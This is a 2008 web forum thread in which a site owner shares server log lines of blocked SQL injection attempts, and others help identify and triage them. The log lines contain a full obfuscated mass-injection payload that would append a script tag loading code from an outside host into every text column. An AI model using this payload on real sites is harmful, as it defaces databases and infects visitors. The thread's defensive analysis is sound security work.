
SQL Injection attempts on our website

Motiv
Posted: Thu Jun 05, 2008 3:07 pm

From the logs today:

2008-06-05 06:41:37 x.x.x.x GET /detail.aspx ID=5194;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 854 296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5194';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 3296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 0 1744 854 281
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 249


What do you all make of this? I don't think it was successful - the HTTP return code was 403 Forbidden. I've been through the database and code on our pages making sure no yay fun scripts were being called from CommieVille.

Groovicus
Posted: Thu Jun 05, 2008 3:32 pm

Somebody tried to run a script to inject malicious JavaScript into your database. I am guessing that it is an Asprox variant.

http://www.bandnut.com/forum/forum_posts.asp?TID=19080

Motiv
Posted: Thu Jun 05, 2008 3:40 pm

How can I make sure it wasn't successful?

I read over the post on the link you provided and found none of those malicious files on the web server.

Which table in the database should I be looking at? Looks like a table named cursor, if I am reading right?

Groovicus
Posted: Thu Jun 05, 2008 3:51 pm

If the return code was a 403 error, then the attack was not successful. Are any of your webpages showing JavaScript that does not belong? I do not use ASP or Microsoft SQL, so I don't know all that much about it, but there are quite a few pages that discuss it in depth. Perhaps one of them has detection measures.
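
A log-triage sketch for entries like the ones quoted in the first post, added here as an example and not posted by anyone in the thread: it URL-decodes the query string, folds the mixed-case keywords, decodes the hex blob inside CAST(0x... AS VARCHAR) to show what would have been appended, and reports the HTTP status. It assumes the field order of the quoted lines (query string is the sixth field, status is sixth from the end); the sample line and its script tag are constructed.

```python
import re
from urllib.parse import unquote

# SQL Server system type ids the payload filters on (b.xtype = ...)
XTYPES = {"35": "text", "99": "ntext", "167": "varchar", "231": "nvarchar"}

def build_sample_line(tag, status):
    """Constructed line shaped like the ones in the post (not a real log entry)."""
    blob = tag.encode("ascii").hex().upper()
    query = ("ID=1;dEcLaRe%20@t%20vArChAr(255)%20FrOm%20sYsObJeCtS%20a"
             "%20AnD%20(b.xType=99%20oR%20b.xTyPe=35)"
             "%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(x)%2bcAsT(0x"
             + blob + "%20aS%20vArChAr(67))');--")
    return ("2008-06-05 06:41:37 x.x.x.x GET /detail.aspx " + query +
            " 80 - 192.0.2.10 HTTP/1.1 Bot - - www.example.invalid "
            + str(status) + " 6 64 0 854 296")

def triage(line):
    """Summarise one log line: what the query tried to do and how the server answered."""
    fields = line.split()                 # the raw query has no spaces (%20 encoded)
    folded = unquote(fields[5]).lower()   # undo %XX encoding and mIxEd case
    status = int(fields[-6])              # assumed layout: status sub win32 bytes bytes time
    m = re.search(r"cast\(0x([0-9a-f]+)\s+as\s+varchar", folded)
    injected = None
    if m and len(m.group(1)) % 2 == 0:
        injected = bytes.fromhex(m.group(1)).decode("latin-1")
    types = sorted({XTYPES.get(n, n) for n in re.findall(r"xtype=(\d+)", folded)})
    return {
        "status": status,
        "substatus": fields[-5],
        "rejected": status >= 400,
        # cursor over sysobjects plus dynamic exec(): an UPDATE across every user table
        "mass_update": "sysobjects" in folded and "exec(" in folded,
        "column_types": types,            # column types the UPDATE would touch
        "injected": injected,             # string that would be appended to each value
    }

if __name__ == "__main__":
    sample = build_sample_line("<script src=//example.invalid/x.js></script>", 403)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

The `column_types` and `injected` values tell you what to search for in the database if any matching entry shows a 2xx status instead of a 4xx. In the quoted lines the status is followed by substatus 6, which IIS documents as 403.6, IP address rejected.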